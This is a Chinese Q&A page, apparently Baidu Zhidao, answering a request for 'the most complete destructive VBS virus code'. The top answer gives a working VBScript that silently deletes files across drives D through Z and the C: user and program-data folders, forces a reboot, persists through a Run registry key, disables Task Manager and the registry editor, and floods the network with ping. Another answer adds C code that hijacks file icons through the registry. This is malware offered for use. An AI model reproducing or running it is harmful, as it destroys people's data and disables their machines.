求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。

 我来答
帐号已注销
2017-08-23 · TA获得超过5564个赞
知道小有建树答主
回答量:931
采纳率:0%
帮助的人:240万
展开全部
那废话不说,问这个如何?不懂可以问我
On Error Resume Next
dim avest,xufso,wscrt
Set avest = WScript.Createobject("WScript.Shell")
Set wscrt = WScript.Createobject("WScript.Shell")
Set xufso = CreateObject("Scripting.FileSystemObject")
avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
xufso.CreateFolder "C:\VBScript\"
wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
do
wscrt.run "ping 192.168.1.1 -l 65500 -t"
loop
上海国想
2024-12-02 广告
文件被勒索病毒加密后,上海国想科技发展有限公司建议立即断开网络连接,防止病毒扩散。接着,评估损失,备份未加密的重要数据,并确保备份设备未被感染。随后,使用专业的反病毒软件或解密工具进行扫描和清除。如果自行解密无效,及时联系专业的计算机安全服... 点击进入详情页
本回答由上海国想提供
Adam博士001
2019-05-04
知道答主
回答量:10
采纳率:100%
帮助的人:5241
展开全部
先右键创建一个文本文档,打开它,输入下面的代码:
do
msgbox "此处可写任何文字"
loop
然后点左上角文件,另存为,不要改任何东西了,直接在文件后面加.vbs后缀。
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
匿名用户
2019-03-15
展开全部
伪熊猫烧香病毒 灰帽创造
#include<stdio.h>
#include<windows.h>
#include<stdlib.h>
#include<string.h>
#include<time.h>
#include <direct.h>
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{

char buf[200] = "";
char path[300] = "reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons /v 3 /t reg_sz /d";
_getcwd(buf,sizeof(buf));
strcat(buf,"\\恐怖.exe");
strcat(path," ");
strcat(path,buf);
strcat(path," ");
strcat(path,"/f");
system(path);
HKEY hKey;
system(path);
RegOpenKeyEx(HKEY_CLASSES_ROOT,(LPCTSTR)"txtfile\\DefaultIcon",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "",0,REG_SZ,(const unsigned char*)buf,sizeof(buf));
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_CLASSES_ROOT,(LPCTSTR)"exefile\\DefaultIcon",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "",0,REG_SZ,(const unsigned char*)buf,sizeof(buf));
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_CLASSES_ROOT,(LPCTSTR)"dllfile\\DefaultIcon",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "",0,REG_SZ,(const unsigned char*)buf,sizeof(buf));
RegCloseKey(hKey);
system("taskkill /f /im explorer.exe & start explorer.exe");
return 0;
}
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
收起 2条折叠回答
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式